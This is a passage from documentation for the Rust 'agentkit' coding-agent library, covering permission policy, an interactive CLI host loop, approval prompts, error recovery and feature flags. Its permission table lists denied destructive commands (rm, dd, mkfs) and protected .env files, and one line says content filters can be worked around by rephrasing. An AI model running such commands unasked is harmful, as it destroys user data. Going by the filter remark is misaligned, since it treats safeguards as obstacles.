       .preserve_kind(Context)       (project context is always needed)

For coding agents, keeping recent tool interactions is usually more valuable than keeping old conversation text — the model needs to know what it just read and edited, not what the user said 20 turns ago.
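The keep-recent-with-preserved-kinds behavior can be sketched as a pure function over item kinds. This is a simplification — the real strategy operates on full transcript items, and the names here are illustrative:

```rust
#[derive(Clone, Copy, Debug, PartialEq)]
enum Kind { System, Context, User, Assistant, Reasoning }

// Keep all preserved kinds; of the remaining items, drop the oldest so
// that at most `keep` non-preserved items survive, preserving order.
fn keep_recent(items: &[Kind], keep: usize, preserved: &[Kind]) -> Vec<Kind> {
    let non_preserved = items.iter().filter(|k| !preserved.contains(k)).count();
    let mut to_drop = non_preserved.saturating_sub(keep);
    items
        .iter()
        .copied()
        .filter(|k| {
            if preserved.contains(k) {
                true
            } else if to_drop > 0 {
                to_drop -= 1; // drop this older, non-preserved item
                false
            } else {
                true
            }
        })
        .collect()
}
```

Dropping from the front means the oldest conversation turns go first while the system prompt and project context always survive.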

Permission posture

Default-deny is safest but requires more approval prompts. Default-allow with denylists is more fluid but riskier. Most coding agents land in the middle:

Recommended permission posture:

  Scope                    Decision
  Filesystem reads         Allow within workspace
  Filesystem writes        Allow within workspace (with read-before-write)
  Filesystem outside       RequireApproval
  Protected files (.env)   Deny
  Shell (known safe)       Allow (git, cargo, npm, ls, etc.)
  Shell (unknown)          RequireApproval
  Shell (dangerous)        Deny (rm, dd, mkfs)
  MCP (trusted)            Allow
  MCP (unknown)            RequireApproval
  Fallback                 Deny
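Flattened into a single decision function, the posture looks roughly like this. It is a caricature for illustration — the real system composes PathPolicy, CommandPolicy, and a fallback checker rather than one match, and the `kind`/`target` strings are stand-ins for typed permission requests:

```rust
#[derive(Debug, PartialEq)]
enum Decision {
    Allow,
    RequireApproval,
    Deny,
}

// Filesystem decisions key on the path, shell decisions on the executable;
// the final arm is the default-deny fallback from the table above.
fn decide(kind: &str, target: &str, workspace: &str) -> Decision {
    match kind {
        "fs" if target.ends_with(".env") => Decision::Deny,
        "fs" if target.starts_with(workspace) => Decision::Allow,
        "fs" => Decision::RequireApproval,
        "shell" => match target {
            "git" | "cargo" | "npm" | "ls" => Decision::Allow,
            "rm" | "dd" | "mkfs" => Decision::Deny,
            _ => Decision::RequireApproval,
        },
        _ => Decision::Deny,
    }
}
```

Note the ordering: the `.env` check comes before the workspace check, so protected files are denied even inside the workspace.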

What the host owns

agentkit handles the loop, tools, permissions, and streaming. The host application owns everything else:

  • Input/output — how users type messages and see results
  • Session lifecycle — when sessions start, end, and resume
  • Error recovery — what to do when the model fails or rate-limits
  • Configuration — which model, which tools, which policies
  • Persistence — saving transcripts, session state, usage logs

The boundary is intentional: agentkit is a library, not a framework. The host is in control.

Example: openrouter-agent-cli is the closest existing example to a full coding agent — it combines context, tools, shell, MCP, compaction, and reporting.

The interactive CLI

This chapter covers the host-side implementation of an interactive coding agent CLI: input handling, output rendering, approval UX, session lifecycle, and error recovery.

Everything in this chapter is host code — agentkit doesn’t include a CLI. The library provides the loop, and the host provides the user interface. This separation means the same agentkit crates power a terminal CLI, a web server, an IDE plugin, or a headless CI agent.

The host loop skeleton

Before diving into details, here’s the complete structure of an interactive CLI host:

// Setup
let agent = Agent::builder()
    .model(adapter)
    .tools(tools)
    .permissions(permissions)
    .observer(reporter)
    .compaction(compaction)
    .cancellation(cancellation_handle)
    .build()?;

let mut driver = agent.start(session_config).await?;

// Submit system prompt and context
driver.submit_input(system_items)?;
driver.submit_input(context_items)?;

// Main interaction loop
loop {
    // Read user input
    let input = read_user_input()?;
    if input == "/exit" { break; }

    driver.submit_input(vec![user_item(&input)])?;

    // Drive the turn to completion
    loop {
        match driver.next().await? {
            LoopStep::Finished(_) => break,
            LoopStep::Interrupt(LoopInterrupt::AwaitingInput(_)) => break,
            LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(p)) => {
                handle_approval(p, &mut driver)?;
            }
            LoopStep::Interrupt(LoopInterrupt::AuthRequest(p)) => {
                handle_auth(p, &mut driver)?;
            }
        }
    }
}

Every section below fills in a piece of this skeleton.

Input handling

A coding agent CLI needs to handle:

  • Single-line user messages
  • Multi-line input (pasted code, heredocs)
  • Special commands (exit, help, clear)
  • Ctrl-C for turn cancellation (not process exit)

Cancellation wiring

Wire Ctrl-C to the CancellationController, not to process exit:

let controller = CancellationController::new();
let handle = controller.handle();

ctrlc::set_handler(move || {
    controller.interrupt();
})?;

The first Ctrl-C cancels the current turn: the turn ends cleanly with FinishReason::Cancelled. A second Ctrl-C, when nothing is running, exits the process.
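The two-stage behavior reduces to a small piece of shared state. This is a sketch: in a real host the flag would be set by the driver when a turn starts and cleared when it ends, and the names here are illustrative:

```rust
use std::sync::atomic::{AtomicBool, Ordering};
use std::sync::Arc;

#[derive(Debug, PartialEq)]
enum CtrlCAction {
    CancelTurn,
    Exit,
}

// Shared between the Ctrl-C handler and the host loop: if a turn is
// running, the first press cancels it; a press with nothing running exits.
struct CtrlCPolicy {
    turn_running: Arc<AtomicBool>,
}

impl CtrlCPolicy {
    fn on_ctrl_c(&self) -> CtrlCAction {
        // swap() atomically reads and clears the flag, so two racing
        // presses can't both cancel.
        if self.turn_running.swap(false, Ordering::SeqCst) {
            CtrlCAction::CancelTurn
        } else {
            CtrlCAction::Exit
        }
    }
}
```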

Output rendering

Streaming text

The StdoutReporter renders ContentDelta events as they arrive. For a CLI, this means writing each text chunk to stdout immediately:

fn handle_event(&mut self, event: AgentEvent) {
    if let AgentEvent::ContentDelta(Delta::AppendText { chunk, .. }) = event {
        print!("{}", chunk);
        std::io::stdout().flush().ok();
    }
}

Tool activity

Display tool calls as they happen so the user knows what the agent is doing:

→ fs.read_file(path: "src/main.rs")
→ fs.replace_in_file(path: "src/main.rs", ...)
→ shell.exec(executable: "cargo", argv: ["build"])

Usage reporting

At the end of each turn, display token counts and cost:

tokens: 1,234 in / 567 out | cost: $0.02

Approval UX

When the loop returns an approval interrupt, present it clearly:

⚠ shell.exec wants to run: rm -rf target/
  Allow? [y/n/always]:

Consider supporting:

  • y — approve once
  • n — deny
  • always — approve and add to allowlist for this session

The approval response maps to ApprovalDecision::Approve or ApprovalDecision::Deny.
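The prompt handler reduces to a small mapping plus a per-session allowlist. A sketch, assuming a stand-in `ApprovalDecision` and an illustrative helper name:

```rust
use std::collections::HashSet;

#[derive(Debug, PartialEq)]
enum ApprovalDecision {
    Approve,
    Deny,
}

// Map the y/n/always answer to a decision. "always" also records the
// command in a per-session allowlist so future requests skip the prompt.
fn resolve_answer(
    answer: &str,
    command: &str,
    allowlist: &mut HashSet<String>,
) -> ApprovalDecision {
    if allowlist.contains(command) {
        return ApprovalDecision::Approve; // previously marked "always"
    }
    match answer.trim() {
        "y" => ApprovalDecision::Approve,
        "always" => {
            allowlist.insert(command.to_string());
            ApprovalDecision::Approve
        }
        _ => ApprovalDecision::Deny, // "n" and anything unrecognized deny
    }
}
```

Defaulting unrecognized input to Deny keeps the safe path the easy path.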

Session lifecycle

Multi-turn sessions

A coding agent session typically spans many user turns. The driver persists across turns — the transcript accumulates, compaction fires as needed, and the model retains context from earlier in the conversation.

Graceful shutdown

On exit, flush any buffered reporters, print a final usage summary, and clean up resources. If MCP servers are connected, shut them down cleanly.

Error recovery

Model errors

If the model returns an error (rate limit, content filter, network failure), the driver returns Err(LoopError::...). Display the error and let the user decide:

match driver.next().await {
    Ok(step) => handle_step(step),
    Err(LoopError::Provider(msg)) => {
        eprintln!("Model error: {msg}");
        eprintln!("Press Enter to retry, or type a new message:");
        // Don't exit — the session is still valid
    }
    Err(LoopError::Cancelled) => {
        eprintln!("Turn cancelled.");
        // Session is still valid, user can send another message
    }
    Err(e) => {
        eprintln!("Fatal error: {e}");
        break;  // Only exit on truly unrecoverable errors
    }
}

The key insight: most errors are recoverable. A rate limit resolves after waiting. A content filter can be worked around by rephrasing. A network timeout may succeed on retry. Only exit the session on errors that genuinely corrupt the driver state.

Tool errors

Tool failures are returned to the model as a ToolResultPart with is_error: true. The model sees the error message and can decide to retry, try a different approach, or report the failure. The CLI doesn’t need to handle tool errors specially — they’re part of the normal conversation flow.

Tool error flow (handled entirely within the loop):

  Model: ToolCall(fs.read_file, { path: "main.rs" })
  Tool:  ToolResultPart { is_error: true, output: "File not found" }
  Model: "The file doesn't exist in the current directory. Let me check..."
  Model: ToolCall(shell.exec, { executable: "find", argv: [".", "-name", "main.rs"] })
  Tool:  ToolResultPart { output: "./src/main.rs" }
  Model: ToolCall(fs.read_file, { path: "./src/main.rs" })
  Tool:  ToolResultPart { output: "fn main() { ... }" }

  The host never saw the error — the model handled it autonomously.

Design checklist

A production interactive CLI should handle all of these:

  • Ctrl-C cancels the current turn, not the process
  • Second Ctrl-C (when no turn is running) exits cleanly
  • Streaming text renders as it arrives
  • Tool calls are displayed with name and key arguments
  • Approval prompts clearly show what’s being requested
  • Usage is displayed after each turn
  • Model errors are displayed and the session continues
  • Graceful shutdown flushes reporters and disconnects MCP
  • Multi-line input is supported for pasting code

Example: openrouter-agent-cli implements most of these patterns. The remaining work for a production CLI is polish: better terminal rendering, richer approval UX, and configuration management.

Putting it all together

This final chapter traces the complete path of a user request through the system, from keystroke to completed turn, touching every layer we’ve covered.

This is the payoff chapter. Every type, trait, and design decision from the previous 22 chapters appears here in context. If something below is unfamiliar, the cross-reference tells you where to look.

The scenario

A user types: “Add error handling to the parse function in src/parser.rs”

The agent is configured with filesystem tools, shell tools, a PathPolicy for the workspace, a CommandPolicy with cargo in the allowlist, ForegroundThenDetachAfter(10s) for shell commands, a KeepRecentStrategy compaction pipeline, and a CompositeReporter writing to stdout and a usage tracker.

What happens

1. Input submission

The CLI reads the user’s message and submits it as a User item:

driver.submit_input(vec![Item {
    kind: ItemKind::User,
    parts: vec![Part::Text(TextPart { text: user_input, .. })],
    ..
}])?;

2. Compaction check

The driver checks the compaction trigger. If the transcript exceeds the configured threshold, the compaction pipeline runs — dropping old reasoning blocks, trimming failed tool results, keeping recent items.

3. Turn construction

The driver builds a TurnRequest containing:

  • The working transcript (system prompt, context items, conversation history)
  • Tool specs from the registry (fs.read_file, fs.write_file, fs.replace_in_file, shell.exec, etc.)
  • The normalized prompt cache request for the turn

4. Model invocation

The adapter serializes the request and sends it to the provider. The response streams back as SSE chunks.

5. First tool call — read the file

The model decides it needs to see the file first. It emits a ToolCallPart:

{ "name": "fs.read_file", "input": { "path": "src/parser.rs" } }

The driver:

  1. Looks up fs.read_file in the registry
  2. Evaluates the FileSystemPermissionRequest::Read against the permission checker
  3. The PathPolicy allows reads under the workspace root → Allow
  4. Executes the tool
  5. FileSystemToolResources records that src/parser.rs has been read
  6. Appends the ToolResultPart to the transcript

6. Automatic roundtrip

The driver starts another model turn with the updated transcript. The model now has the file contents.

7. Second tool call — edit the file

The model emits a fs.replace_in_file call with the old and new text.

The driver:

  1. Evaluates FileSystemPermissionRequest::Edit for src/parser.rs
  2. Checks read-before-write policy → the file was read in step 5 → Allow
  3. Executes the replacement
  4. Appends the result

8. Third tool call — verify the change

The model runs shell.exec with cargo check.

The driver:

  1. Evaluates the ShellPermissionRequest
  2. CommandPolicy has cargo in the allowlist → Allow
  3. The task manager routes it as ForegroundThenDetachAfter(10s)
  4. The command finishes in 3 seconds → result returned immediately
  5. Appends the result

9. Final response

The model sees the successful build output and produces a text response explaining what it changed. The StdoutReporter streams each text chunk to the terminal as it arrives.

10. Turn completion

The model finishes with FinishReason::Completed. The driver returns LoopStep::Finished(TurnResult). The CLI displays the usage summary and waits for the next user input.

The dependency graph in action

User input
  │
  ▼
agentkit-core ──────────── Item, Part, Delta, Usage, FinishReason, identifiers
  │
  ▼
agentkit-loop ──────────── LoopDriver, TurnRequest, LoopStep, AgentEvent
  │
  ├── agentkit-compaction ─ CompactionTrigger, CompactionPipeline
  │                         (fires before step 3, trims old items)
  │
  ├── agentkit-provider-* ─ ModelAdapter → ModelSession → ModelTurn
  │                         (step 4, sends transcript, streams response)
  │
  ├── agentkit-tools-core ─ ToolExecutor, PermissionChecker
  │   │                     (steps 5, 7, 8: preflight + execute)
  │   │
  │   ├── agentkit-tool-fs ── ReadFileTool, ReplaceInFileTool
  │   │                       (steps 5, 7)
  │   │
  │   └── agentkit-tool-shell ─ ShellExecTool
  │                              (step 8)
  │
  ├── agentkit-task-manager ── AsyncTaskManager, routing
  │                            (step 8, ForegroundThenDetachAfter)
  │
  └── agentkit-reporting ──── StdoutReporter, UsageReporter
                               (every step, event delivery)

Every crate has a clear, narrow responsibility. The loop coordinates. Tools execute. Permissions gate. Reporters observe. The host decides.

Cross-reference

Each step in the walkthrough above maps to a chapter:

  Step                     Chapter
  1. Input submission      Ch 6: Driving the loop
  2. Compaction check      Ch 16: Transcript compaction
  3. Turn construction     Ch 5: The model adapter boundary, Ch 15: Prompt caching
  4. Model invocation      Ch 1: Talking to models, Ch 4: Streaming
  5. Tool call (read)      Ch 10: Permissions, Ch 11: Filesystem tools
  6. Automatic roundtrip   Ch 6: Driving the loop
  7. Tool call (edit)      Ch 11: Filesystem tools
  8. Tool call (shell)     Ch 12: Shell execution, Ch 18: Task management
  9. Final response        Ch 4: Streaming and deltas, Ch 19: Reporting
  10. Turn completion      Ch 6: Driving the loop

Where to go from here

This book has covered the full architecture of an agent system. Some areas for further exploration:

  • Custom providers — implement adapters for Anthropic, Google, or local model servers using either CompletionsProvider (~50 lines) or the raw traits (~200-500 lines)
  • Custom tools — database queries, API integrations, code analysis, deployment automation
  • MCP servers — connect to external tool providers for GitHub, databases, Slack, etc.
  • Advanced compaction — semantic summarization with a nested agent backend
  • Multi-agent patterns — tools that spawn sub-agents, parallel agent execution, orchestrator/worker architectures
  • Production hardening — retry strategies, rate limiting, cost controls, audit logging, persistent sessions

The agentkit crate ecosystem is designed to grow at the edges. The core loop and data model are stable foundations. New tools, providers, and integration patterns can be added without changing the architecture.

  Stable (change rarely)                 Grows (add freely)
  agentkit-core types                    agentkit-provider-* crates
  ModelAdapter / ModelSession traits     agentkit-tool-* crates
  LoopDriver / LoopStep                  CompactionStrategy implementations
  Tool / ToolSpec / ToolRegistry         LoopObserver implementations
  PermissionChecker / PermissionPolicy   Custom ContextSource implementations
  Delta protocol                         MCP server integrations

Example: The examples/ directory in the agentkit repository contains working implementations that exercise every concept in this book, from the simplest chat loop to a full multi-tool coding agent.

Feature flags

The umbrella crate agentkit re-exports subcrates behind feature flags.

Default flags

  • core → agentkit-core
  • capabilities → agentkit-capabilities
  • tools → agentkit-tools-core
  • task-manager → agentkit-task-manager
  • loop → agentkit-loop
  • reporting → agentkit-reporting

Optional flags

  • compaction → agentkit-compaction
  • context → agentkit-context
  • mcp → agentkit-mcp
  • adapter-completions → agentkit-adapter-completions
  • provider-groq → agentkit-provider-groq
  • provider-mistral → agentkit-provider-mistral
  • provider-ollama → agentkit-provider-ollama
  • provider-openai → agentkit-provider-openai
  • provider-openrouter → agentkit-provider-openrouter
  • provider-vllm → agentkit-provider-vllm
  • tool-fs → agentkit-tool-fs
  • tool-shell → agentkit-tool-shell
  • tool-skills → agentkit-tool-skills

Typical combinations

Minimal orchestration:

agentkit = { version = "0.2.2", features = ["core", "capabilities", "tools", "loop"] }

Coding agent:

agentkit = { version = "0.2.2", features = [
    "core", "capabilities", "context", "tools",
    "loop", "tool-fs", "tool-shell", "reporting",
] }

MCP-enabled agent:

agentkit = { version = "0.2.2", features = [
    "core", "capabilities", "context", "tools",
    "loop", "tool-fs", "tool-shell", "reporting", "mcp",
] }

OpenRouter-backed example host:

agentkit = { version = "0.2.2", features = [
    "core", "capabilities", "tools", "loop",
    "reporting", "provider-openrouter",
] }